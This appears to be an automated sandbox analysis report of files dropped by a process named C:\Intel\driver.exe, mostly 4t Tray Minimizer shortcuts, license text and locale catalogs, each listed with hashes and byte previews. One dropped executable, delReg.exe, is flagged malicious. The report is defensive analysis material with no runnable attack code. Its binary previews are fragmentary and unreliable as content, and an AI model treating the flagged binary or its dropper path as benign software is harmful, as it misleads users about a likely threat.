                                                                                                                                                                  Preview:..4t Tray Minimizer Free/Pro 6.07: What's new?..=================================================....ADDED.. [+] Windows 10 support.. [+] Windows 8 and 8.1 support.. [+] Support for console windows.. [+] Localization support.. [+] French language added. Thanks Jean-Pierre Lord for translation.. [+] Chinese language added. Thanks Merci chao for translation.. [+] Italian language added. Thanks Massimo Marcacci for translation.. [+] Portuguese (Brazil) language added. Thanks Eduardo Lampugnani for translation... [+] Russian language added. Thanks Ringil Endimion for translation... [+] Simplified Chinese translation added. Thanks Zeojc Uts for translation.. [+] Spanish language added. Thanks Claudio Salvio for translation... [+] German language added. Thanks Thomas Creutz and Maximilian Balter for translation.. [+] Ability to redefine action for the mouse click on the title bar.. [+] Inactive favorite windows can be automatically minimized to tray after certain idle time is r

                                                                                                                                                                  C:\Intel\Trays\company.url

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://www.4t-niagara.com>), ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):51
                                                                                                                                                                  Entropy (8bit):4.6004442740684155
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HRAbABGQYm/0S432ZEZFn:HRYFVm/r4bX
                                                                                                                                                                  MD5:40D94BAF7D28D32280FCF0DD570A37E6
                                                                                                                                                                  SHA1:F87EF8C328509F0135D98FF4B35C915F23D58D0A
                                                                                                                                                                  SHA-256:F192C975D67838A743CAACD8CA71877AE043FAD6F18E2F0B0FB96D0F9B66E15E
                                                                                                                                                                  SHA-512:C7277C09CCC99C1DCF1969C2D1771A046E803BA1B264A183D1ED473C2DAE3328F7FA1970B350B7CD584A8FE20CA81C3CA851A59C07D6ADFE25BDE801BF877997
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[InternetShortcut]..URL=http://www.4t-niagara.com..

                                                                                                                                                                  C:\Intel\Trays\contact.url

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://www.4t-niagara.com/contact_us.html>), ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):67
                                                                                                                                                                  Entropy (8bit):4.637005519385317
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HRAbABGQYm/0S432ZEZ3dLlhW5vn:HRYFVm/r4bnlhW5v
                                                                                                                                                                  MD5:6F0250612EC7B39A83E74CF3CA356CA5
                                                                                                                                                                  SHA1:80EFD04C98430B1748381010C68659DFC2557A5F
                                                                                                                                                                  SHA-256:241D88C602F3298DA04D403E97E831E843D9C6176FA7C661FCA9FB9EA7CDF7BE
                                                                                                                                                                  SHA-512:879752B9F83BC53F21656AAABE98B6B4955CA4A2B67531F92D3A3333230AAE59E989A9CA29368C3097521E3D3C92874511B54260732E07B1CA03FCEE47EC3C01
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[InternetShortcut]..URL=http://www.4t-niagara.com/contact_us.html..

                                                                                                                                                                  C:\Intel\Trays\delReg.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):46592
                                                                                                                                                                  Entropy (8bit):6.23811864882066
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:jlQqBEBHyBqM/5b8inuL5wKzE9nfw6dMcK10ztk2hEwxa1zTH4p1Alor/4Bv/eDk:hQqBE3ubz2LzEaOMcwVvSaF4bADGD8X
                                                                                                                                                                  MD5:E30D6A1276746415D9E02420B9163D00
                                                                                                                                                                  SHA1:D6E7245784FB9981FF15D56E10D75BDC342B4481
                                                                                                                                                                  SHA-256:211F078A2914BA88EE3A739A1C7A3CDE592BB8A5ED522D55038274000F7C6C89
                                                                                                                                                                  SHA-512:1C19BB914A7B21AAC11C4E9551B99081DC49F7DE3A12D911B457A5D838E4BFD18DF28375B8EEC902EAEF5CC1BEE7927AF385E89823693E246A6F003CF6D6B499
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@..................................................................................................................................................CODE....4........................... ..`DATA................................@...BSS......................................idata..............................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                  C:\Intel\Trays\faq.url

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://www.4t-niagara.com/tray_faq.html>), ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):65
                                                                                                                                                                  Entropy (8bit):4.731392382286379
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HRAbABGQYm/0S432ZEZ3xEco6Jovn:HRYFVm/r4bQc4v
                                                                                                                                                                  MD5:77D33FFFDC8B189F0E7A6BCF8460CD28
                                                                                                                                                                  SHA1:E68219FEDE27F53EA5E6606DF3C556DF9D2E6DF9
                                                                                                                                                                  SHA-256:4681D53DD83DE83A9DABCA7DC7D7AEEF1BA71EDC24254E244920F27BF6EA05EB
                                                                                                                                                                  SHA-512:8A8BC2120EC2987A2FE3379535530A784644E3BE0AEA11385DC2548DF13289DB834A796DECE770A074B53B60429CDC4F593BC71D776069D2DD8FDE4607B0DE28
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[InternetShortcut]..URL=http://www.4t-niagara.com/tray_faq.html..

                                                                                                                                                                  C:\Intel\Trays\license.txt

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2351
                                                                                                                                                                  Entropy (8bit):5.177290930473369
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2geJSyUwiCEfm2CwZupvE32sHiHnOxmiRt:2gZyUDO2fZEvE3+HnOBv
                                                                                                                                                                  MD5:04B3166626C39B806F710D2243A0B1C3
                                                                                                                                                                  SHA1:2EB73BAC75D2B6C616580D03A84DB3035AB16A4B
                                                                                                                                                                  SHA-256:6D9403BEC7B9060DE5289BCBB28024379F550A98233E3F776E3E9833DDEA45CB
                                                                                                                                                                  SHA-512:4C2A78E1274EF3AF1F82C61A48D1FD18A556395B72E47943F4925F5AF958DBE8A837F95A230B1F52DC763DC14A1692CE4545E70ECB13115B5F40A6E8086431E3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..4t Tray Minimizer Free/Pro 6.07: THE LICENSE..===============================================....You should carefully read the following terms and..conditions before using this software. Your use of this..software indicates your acceptance of this license..agreement and warranty.....* 4t Niagara Software exclusively owns all.. copyrights to 4t Tray Minimizer.....* You can use the 4t Tray Minimizer Free version for personal .. and commercial purposes without any time limit.....* One LICENSED copy of 4t Tray Minimizer Pro may be used .. by one and only one of the following ways:.... 1) Personally by a single person, who uses the software .. on one or more computers.... 2) Installed on a single workstation used nonsimultaneously.. by multiple people....* The sale of and/or distribution of licensed copies.. of 4t Tray Minimizer Pro is strictly forbidden. It is a.. violation of this agreement to loan, rent, lease,.. borrow, or transfer the use of licensed copies of.. 4t N

                                                                                                                                                                  C:\Intel\Trays\locale\de2\LC_MESSAGES\default.mo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 382 messages, Project-Id-Version: 4t Tray Minimizer 6.06 'Ausgeblendete Fenster'
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):30905
                                                                                                                                                                  Entropy (8bit):5.069231381707322
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:4m0kM8gxaxtDp/C01snfhapyU9MJavZoK1Afz09PG3:x0kM8VF/91ohXKGo9PG3
                                                                                                                                                                  MD5:593F8A1D92C99751439CB11FCA5A5147
                                                                                                                                                                  SHA1:1A2FAB607168A473B65570199EAB2E3FBAEE7329
                                                                                                                                                                  SHA-256:5AFD8C6487235E7BAA5E17FAAE8E951C59342E63A5BBA91312D264742FA75DFB
                                                                                                                                                                  SHA-512:38B93610939400884143D4B093DD35A74F635D9CF4C6113E7B2C174BA1DF1805B167D6BE8B8C1F879497EFE21CA2E838B2DACCED73F199DAE1F20EC665AD7093
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........~........................................ ....... ......( ......C ......M ......V ..-..._ ....... ....... ....... ....... ....... ....... ....... ..).... ..#....!......1!......7!......S!......`!......v!..!....!.......!.......!.......!.......!..C....!..*...."..9...="......w"......}"......."..&...."......."......."......."..,...."..=....#......L#......Z#..8...l#.......#.......#.......#.......#.......#.......#.......#.......#.. ....$......0$......@$......H$......S$......k$..9...v$../....$.......$..3....$...... %......0%......_%......c%......i%......x%.......%.......%.......&.......&.......&..<....&.......'.......'.......'..!....'......@'..!...H'..-...j'.......'.......'.......'..,....'.......(..4....(.......(..+....(.......)..(...<)..)...e)..+....)..8....)..F....)......;*......I*......i*......w*.......*.......*.......*.......*..2....*.......*.......*.......+..?....+..5...Y+..6....+.......+.......+.......+.......,.......,......+,......1,......;,......H,......U,......],..%...r,......

                                                                                                                                                                  C:\Intel\Trays\locale\de\LC_MESSAGES\default.mo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 381 messages, Project-Id-Version: 4t Tray Minimizer 6.06 'Versteckte Fenster'
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):30016
                                                                                                                                                                  Entropy (8bit):5.060728405451012
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:T0ZZpKDtuTp/d01snfhapyU9dpz1Bc+zdRs0s4FVUzs:T0oi/K1ohICIuzs
                                                                                                                                                                  MD5:45C010F6FE41F2F39B812800C9AA6628
                                                                                                                                                                  SHA1:CFF21B13A3181D6BDD40A6965814E489024C86FA
                                                                                                                                                                  SHA-256:BB2A9AD8C5138613D58D27895BE22CA9B42C370BD7F3DC19C51D4418A5990BC2
                                                                                                                                                                  SHA-512:CDD20FDE69978FA38057178D4CDA665B8F5281C7C960C06897E747D954AA3387A5AC337C577C999FA38680D0186E5A6449DAD942D7A0C8C3C2482C3B4CED4C80
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........}................................................ ....... ......3 ......= ......F ..-...O ......} ....... ....... ....... ....... ....... ....... ..).... ..#.... ......!!......'!......C!......P!......f!..!...o!.......!.......!.......!.......!..C....!..*...."..9...-"......g"......m"......s"..&...."......."......."..,...."..=...."......(#......6#..8...H#.......#.......#.......#.......#.......#.......#.......#.......#.. ....#.......$.......$......$$....../$......G$..9...R$../....$.......$..3....$.......$.......%......;%......?%......E%......T%......n%.......%......f&.......&.......&..<....&.......&.......&.......&..!....&.......'..!...$'..-...F'......t'.......'.......'..,....'.......'..4....(.......(..+....(.......(..(....)..)...A)..+...k)..8....)..F....).......*......%*......E*......S*......m*......~*.......*.......*..2....*.......*.......*.......*..?....*..5...5+..6...k+.......+.......+.......+.......+.......+.......,.......,.......,......$,......1,......9,..%...N,......t,......

                                                                                                                                                                  C:\Intel\Trays\locale\es\LC_MESSAGES\default.mo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 368 messages, Project-Id-Version: 4t Tray Minimizer 6.0 'Ventanas ocultas'
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):30458
                                                                                                                                                                  Entropy (8bit):5.027518042535738
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:nCFqE+vfRtop/dSwwnvhafRtnoVnUlQNf:CtQq/cwmhfVnycf
                                                                                                                                                                  MD5:698A77586654ADEFC181A9C2752393E0
                                                                                                                                                                  SHA1:83CFCE72EB1495F7E3F9E5A8DA2F3723E4FAB910
                                                                                                                                                                  SHA-256:793F85BE0AFD56902465F12165EBBF5EB72C5029DC0F9122C50DBE8DAA1D2B0D
                                                                                                                                                                  SHA-512:93F4E3BD983D6D81B0D455433623DF384FB81AD2E64447174ACC21074DFE047AA62499F045FD66707E5E00E9ACA95F225B867DE5D481392F89490D74C02489AA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........p...........................................................................-...&.......T.......^.......i.......q.......|...................).......#............................ ......' ......= ..!...F ......h ......| ....... ....... ..C.... ..*.... ..9....!......>!......D!......J!..&...Z!.......!.......!..,....!..=....!.......!......."..8...."......X"......f"......n"......v"......z".......".......".......".. ....".......".......".......".......#.......#..9...)#../...c#.......#..3....#.......#.......#.......$.......$.......$......+$......E$......^$......=%......W%......_%..<...{%.......%.......%.......%..!....%.......%..!....%..-....&......K&......g&......~&..,....&.......&..4...j'.......'.......'..(....'..)....'..+....(..8...B(..F...{(.......(.......(.......(.......(.......).......)..2....)......K)......R)......h)..?...r)..5....)..6....).......*......5*......J*......^*......i*......o*......y*.......*.......*.......*..%....*.......*..'....*.."....+......4+......P+......f+......

                                                                                                                                                                  C:\Intel\Trays\locale\fr\LC_MESSAGES\default.mo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 367 messages, Project-Id-Version: 4t Tray Minimizer 6.0 'Fen\303\252tres masqu\303\251es'
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):29470
                                                                                                                                                                  Entropy (8bit):5.062750769039303
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:3r1SPrWd0ZWp/dSwBnvhafRtntA4/85/yOi:71B1/cwZhvi
                                                                                                                                                                  MD5:AB89E520989F70BB3E6D88348B1BB1B4
                                                                                                                                                                  SHA1:94ADB5B2BF6CDF422951A1368246CFB7BA7C7EDA
                                                                                                                                                                  SHA-256:E5BFC9850A8B703BC8111A80A986E95BBD774110BF336779C80C2F0314BCB787
                                                                                                                                                                  SHA-512:C2F8CB2345D8BEBFD9436B066ECAC8EE35A64C106A6CB0F7CD53A74C171DDC50F1F7C948AA63548E1582D33ECFFB4A99E9240F3DD34EAE9147592FBDF38A23F3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........o...........................................................................-...........D.......N.......Y.......a.......l.......}...........).......#............................ ....... ......- ..!...6 ......X ......l ......w ......} ..C.... ..*.... ..9.... .......!......4!......:!..&...J!......q!......|!..,....!..=....!.......!.......!..8...."......H"......V"......^"......f"......j"......v".......".......".. ....".......".......".......".......".......#..9....#../...S#.......#..3....#.......#.......#.......$.......$.......$.......$......5$......N$......-%......G%......O%..<...k%.......%.......%.......%..!....%.......%..!....%..-....&......;&......W&......n&..,...z&.......&..4...Z'.......'.......'..(....'..)....'..+....(..8...2(..F...k(.......(.......(.......(.......(.......(.......)..2....)......;)......B)......X)..?...b)..5....)..6....).......*......%*......9*......D*......J*......T*......a*......n*......v*..%....*.......*..'....*.."....*.......+......++......A+......M+......

                                                                                                                                                                  C:\Intel\Trays\locale\it\LC_MESSAGES\default.mo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 367 messages, Project-Id-Version: 4t Tray Minimizer 6.0 'Finestre nascoste'
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):29520
                                                                                                                                                                  Entropy (8bit):4.974866083390291
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:3riKEaZWp/dSwBnvhafRtnZ3fO5oPYvG2CZ+Xc:7ip/cwZhR5odZZ
                                                                                                                                                                  MD5:E20E2DAD6CA8B7EE2749F54D0A711AC0
                                                                                                                                                                  SHA1:550228B8FE9213054C1F578F55D8CE0E3288499C
                                                                                                                                                                  SHA-256:0492C624FAD7DC6655F8BED19DA0CFFDD1706C559EF892E629992F6FCB1E2DF0
                                                                                                                                                                  SHA-512:50A3D7BBD95E25944A734D20C65E5516A61168C2F7A7E8DD597F63560BA56EDC710BB50C8CA78F40DED1F90D733C713FB050D69BA51A64AE3CFB47606CBD657B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........o...........................................................................-...........D.......N.......Y.......a.......l.......}...........).......#............................ ....... ......- ..!...6 ......X ......l ......w ......} ..C.... ..*.... ..9.... .......!......4!......:!..&...J!......q!......|!..,....!..=....!.......!.......!..8...."......H"......V"......^"......f"......j"......v".......".......".. ....".......".......".......".......".......#..9....#../...S#.......#..3....#.......#.......#.......$.......$.......$.......$......5$......N$......-%......G%......O%..<...k%.......%.......%.......%..!....%.......%..!....%..-....&......;&......W&......n&..,...z&.......&..4...Z'.......'.......'..(....'..)....'..+....(..8...2(..F...k(.......(.......(.......(.......(.......(.......)..2....)......;)......B)......X)..?...b)..5....)..6....).......*......%*......9*......D*......J*......T*......a*......n*......v*..%....*.......*..'....*.."....*.......+......++......A+......M+......

                                                                                                                                                                  C:\Intel\Trays\locale\pt_BR\LC_MESSAGES\default.mo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 368 messages, Project-Id-Version: 4t Tray Minimizer 6.0 'Janelas ocultas'
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):29425
                                                                                                                                                                  Entropy (8bit):5.09510591952236
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:nCmhLDLgQf2Wtop/dSwwnvhafRtnSUs9OqhjajbxPGG8XHR2K5Ht:CmeWe/cwmhv9/mHQXHYyN
                                                                                                                                                                  MD5:85CBD0F7AFE8AC0A245A08A65AC40F7F
                                                                                                                                                                  SHA1:450A5DB373C743CA3ECFA7F6025CEE30E780D18C
                                                                                                                                                                  SHA-256:AAAF351A90E8210C4BC38A29FEB2FC4A67389D77FAE605B0A6FC92450F698096
                                                                                                                                                                  SHA-512:798D21AADEB715ACC703BD2E47CA507B65223A00FC7E036F8AACB7D7EFB877384BA72E0812C5574F406E8D8B5D51BEE7EF75B35ECCA8E111497DF01EFC0E0D80
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........p...........................................................................-...&.......T.......^.......i.......q.......|...................).......#............................ ......' ......= ..!...F ......h ......| ....... ....... ..C.... ..*.... ..9....!......>!......D!......J!..&...Z!.......!.......!..,....!..=....!.......!......."..8...."......X"......f"......n"......v"......z".......".......".......".. ....".......".......".......".......#.......#..9...)#../...c#.......#..3....#.......#.......#.......$.......$.......$......+$......E$......^$......=%......W%......_%..<...{%.......%.......%.......%..!....%.......%..!....%..-....&......K&......g&......~&..,....&.......&..4...j'.......'.......'..(....'..)....'..+....(..8...B(..F...{(.......(.......(.......(.......(.......).......)..2....)......K)......R)......h)..?...r)..5....)..6....).......*......5*......J*......^*......i*......o*......y*.......*.......*.......*..%....*.......*..'....*.."....+......4+......P+......f+......

                                                                                                                                                                  C:\Intel\Trays\locale\ru\LC_MESSAGES\default.mo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 381 messages, Project-Id-Version: 4t Tray Minimizer 6.0 '\320\241\320\272\321\200\321\213\321\202\321\213\320\265 \320\276\320\272\320\275\320\260'
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36266
                                                                                                                                                                  Entropy (8bit):5.3347246127099375
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:T0ZZdTK6uTp/d01snfhapyU9msUf0+mdDVTjMdsB/Sl5+kttuVVP:T0s/K1ohgUSdDb/qG
                                                                                                                                                                  MD5:BC2EC0D45FCA6058421637813799A6AA
                                                                                                                                                                  SHA1:0A894BE9964F1CF885742D214456466453E49BA8
                                                                                                                                                                  SHA-256:0BDA3AFA67B8D4DDE8769ABC0BDC3DB65B7607E3F4524618766F48026C7D23BD
                                                                                                                                                                  SHA-512:C1462688B5AB56B397808EE124CD3057994BEEBC49EBB815659CD995FA60CA26E5968EDB6CAB912944A1BFC895F05EE40F7EB048FA6004204ECA420E7E1BFF87
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........}................................................ ....... ......3 ......= ......F ..-...O ......} ....... ....... ....... ....... ....... ....... ..).... ..#.... ......!!......'!......C!......P!......f!..!...o!.......!.......!.......!.......!..C....!..*...."..9...-"......g"......m"......s"..&...."......."......."..,...."..=...."......(#......6#..8...H#.......#.......#.......#.......#.......#.......#.......#.......#.. ....#.......$.......$......$$....../$......G$..9...R$../....$.......$..3....$.......$.......%......;%......?%......E%......T%......n%.......%......f&.......&.......&..<....&.......&.......&.......&..!....&.......'..!...$'..-...F'......t'.......'.......'..,....'.......'..4....(.......(..+....(.......(..(....)..)...A)..+...k)..8....)..F....).......*......%*......E*......S*......m*......~*.......*.......*..2....*.......*.......*.......*..?....*..5...5+..6...k+.......+.......+.......+.......+.......+.......,.......,.......,......$,......1,......9,..%...N,......t,......

                                                                                                                                                                  C:\Intel\Trays\locale\tr\LC_MESSAGES\default.mo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 196 messages, Project-Id-Version: 4t Tray Minimizer 6.05 'Pencereleri gizle'
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10931
                                                                                                                                                                  Entropy (8bit):5.120322380449319
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:S3o+iYb5QTlt8a6zqGnxXnNvo+alRbG7pyk7/sjrWOqsvzwhxLifNnhvGeWrQ:SY4iTr6z/x9vqrq7pyk7/a+2hn
                                                                                                                                                                  MD5:042CC2B2B39001F1DB68FCBA99BE8335
                                                                                                                                                                  SHA1:17F6BF2F16ABA09478F64E2A15E0C955862E36E1
                                                                                                                                                                  SHA-256:E38FA2ED6DE39F63EA787944A5D225A1D7DB8621A5D7B89C0C7D994FB51B88D4
                                                                                                                                                                  SHA-512:F40F4BDD0B748B8B1CF30B902D5CA7DE04CD7CD616D229593E4B565371B2F4559EA2B0E9528BA42F3E33FA692AE8358F3C8742E7634C6E233FA71C1736CF61AD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:................<.......\.......x.......y...........................................#...........................................,...!...5.......W.......k.......v.......|........................................................................................... ...................%.......-.......8.......P.......[.......g.......................................................................................................,.......@.......K.......f.......l.......v.......~...........................................7......./......."...F.......i.......x.......}...................................(................................................... .......2.......B.......Z.......m.......................................................................................................................(.......?.......L.......S.......b.......n............................................................................................... .......4.......F.......V.......`.......k.......}...............

                                                                                                                                                                  C:\Intel\Trays\locale\zh_CN\LC_MESSAGES\default.mo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 368 messages, Project-Id-Version: 4t Tray Minimizer 6.0 '\351\232\220\350\227\217\347\232\204\347\252\227\345\217\243'
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):26890
                                                                                                                                                                  Entropy (8bit):5.922360490957865
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:nC72cm4Rtop/dSwwnvhafRtnwIa8GajYFdTyooCnCDGjI:Cq4y/cwmhbIa83jYDTyohjI
                                                                                                                                                                  MD5:16685492CB6B7501401CCC05FE445A6D
                                                                                                                                                                  SHA1:F2A2278850153B6C7DC39B5F3EFBCD592BD15F3A
                                                                                                                                                                  SHA-256:43636194082FFAB40B132C5A456BC9A3C5AD3BA0A8B36E8ACF550D2064F29AFC
                                                                                                                                                                  SHA-512:148039622A0CD18CFB58C3B05017F146F0A59C5A560CE2BF138219AB2029CC6E44E55208B78BA077AC6B326BDEF3EEDB5BEBE65E5AA37908EFBB0138F75963DB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........p...........................................................................-...&.......T.......^.......i.......q.......|...................).......#............................ ......' ......= ..!...F ......h ......| ....... ....... ..C.... ..*.... ..9....!......>!......D!......J!..&...Z!.......!.......!..,....!..=....!.......!......."..8...."......X"......f"......n"......v"......z".......".......".......".. ....".......".......".......".......#.......#..9...)#../...c#.......#..3....#.......#.......#.......$.......$.......$......+$......E$......^$......=%......W%......_%..<...{%.......%.......%.......%..!....%.......%..!....%..-....&......K&......g&......~&..,....&.......&..4...j'.......'.......'..(....'..)....'..+....(..8...B(..F...{(.......(.......(.......(.......(.......).......)..2....)......K)......R)......h)..?...r)..5....)..6....).......*......5*......J*......^*......i*......o*......y*.......*.......*.......*..%....*.......*..'....*.."....+......4+......P+......f+......

                                                                                                                                                                  C:\Intel\Trays\locale\zh_TW\LC_MESSAGES\default.mo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 368 messages, Project-Id-Version: 4t Tray Minimizer 6.0 '\345\267\262\351\232\261\350\227\217\347\232\204\350\246\226\347\252\227'
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):27374
                                                                                                                                                                  Entropy (8bit):5.949578124832502
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:nCjO4top/dSwwnvhafRtn481a11/FzwQdgUsTn:Cc/cwmhh8o11NzwQajr
                                                                                                                                                                  MD5:AAC7D05144F6E170F721193C657E5A68
                                                                                                                                                                  SHA1:1BB2EC3F5CAAD65C7195F25115FA5B7A5002017A
                                                                                                                                                                  SHA-256:53ECEF37900D2EF861E981F8D3627B833D1FACD4673915649EC5031238FF01CE
                                                                                                                                                                  SHA-512:5691E673C930A7AB945485882826DF930E8AC32FF3875DCC2CF7B491711198D1675380EA939ACCD36800C86616C94F3AF52884051993D12DF1C329EDF20ADF4A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........p...........................................................................-...&.......T.......^.......i.......q.......|...................).......#............................ ......' ......= ..!...F ......h ......| ....... ....... ..C.... ..*.... ..9....!......>!......D!......J!..&...Z!.......!.......!..,....!..=....!.......!......."..8...."......X"......f"......n"......v"......z".......".......".......".. ....".......".......".......".......#.......#..9...)#../...c#.......#..3....#.......#.......#.......$.......$.......$......+$......E$......^$......=%......W%......_%..<...{%.......%.......%.......%..!....%.......%..!....%..-....&......K&......g&......~&..,....&.......&..4...j'.......'.......'..(....'..)....'..+....(..8...B(..F...{(.......(.......(.......(.......(.......).......)..2....)......K)......R)......h)..?...r)..5....)..6....).......*......5*......J*......^*......i*......o*......y*.......*.......*.......*..%....*.......*..'....*.."....+......4+......P+......f+......

                                                                                                                                                                  C:\Intel\Trays\newsletter.url

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://www.4t-niagara.com/newsletter.html>), ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):67
                                                                                                                                                                  Entropy (8bit):4.575813497443379
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HRAbABGQYm/0S432ZEZ3rWJAhYn:HRYFVm/r4bEJD
                                                                                                                                                                  MD5:DA4B9F72255126C0DBA81B307613197D
                                                                                                                                                                  SHA1:ED1D195ABFD809B37D34979D4298C68199A7FD87
                                                                                                                                                                  SHA-256:8A31785AD405D814CF4D25C95C5D29FFB4C3A33D2B9194C4F88C9AF67356EF78
                                                                                                                                                                  SHA-512:21825FFA2B6B1E31F4230D4D7BF585010187BE8D4ADE401357FFAC25D0D5A03281D74FFA17CFAE84279B1AC6369B43BC386E57260F73EB46E16F7EAD9141AE96
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[InternetShortcut]..URL=http://www.4t-niagara.com/newsletter.html..

                                                                                                                                                                  C:\Intel\Trays\order.txt

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\driver.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1635
                                                                                                                                                                  Entropy (8bit):4.559163323877702
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:e7RkJbOck5g9Xnp5XgefOhqKjDk+5kdpdWbck:w0bOd0XjwefOhhkRfdNk
                                                                                                                                                                  MD5:9CEF843EC120E85CD9FE38A5AB12CD36
                                                                                                                                                                  SHA1:85FCBC458AA0AA6923F5D3280CED69AFC4BD099D
                                                                                                                                                                  SHA-256:B1F55C00EB7556ACF95715441A310B5B051C0DB73B5120388B2863AB27A271FD
                                                                                                                                                                  SHA-512:3BF7DFD05F30A102A8F7471134F26F4FAEECD17DE475CE71FA64EC89C8E8DF5E171261CDCC0FAB4B5EC1A084C116601013EA23A9E08BF555046244CAB7EED62D
                                                                                                                                                                  Malicious:false
